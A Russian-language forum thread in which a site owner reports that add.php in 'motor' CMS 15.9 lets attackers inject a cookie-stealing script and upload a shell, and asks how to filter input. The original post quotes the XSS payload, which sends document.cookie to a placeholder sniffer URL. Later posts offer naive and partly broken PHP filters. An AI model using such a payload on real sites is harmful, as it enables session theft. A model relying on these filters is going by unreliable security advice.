Безопасность от тега script !

У меня такая проблемка, есть файл в творчестве мотора 15.9 юзер сити add.php и через него мне вставляют код <script>img = new Image(); img.src = "ссылка на снифак"+ document.cookie;</script> и варуют куки мои и шелл заливают ... Как обезопасится подскажите ?

check($msg);
$msg = str_replace('<','',$msg);
htmlspecialchars($msg);
И т.д. вариантов уйма

Ну фильтруй переменную на теги < >

1, обновляй мотор до последней версии. И всё ок

4# я с тобой е согласен, ведь есть и люди с 16 мотором и че им обновлять до 18? гг

5, в 16й версии нельзя разве просто check($msg); сделать?

спрошу тут же. На одной странице я пишу код с мотора:

<?
function check($message){
$message=str_replace("I","I",$message);
$ message=str_replace(";","",$message);
$message=htmlspecialchars($ message);
$message=stripslashes(trim($message));
return $message;  }

и под ней пишу так
$message=check($message); но переменная не фильтруется. почему?

rаmzes а в каком месте этот код писать ?

Я знаю что в файле add.php а где поточнее ?

выше записывающих строк
Если не понял то пробуй на самом верзу под шапкой(под инклудами)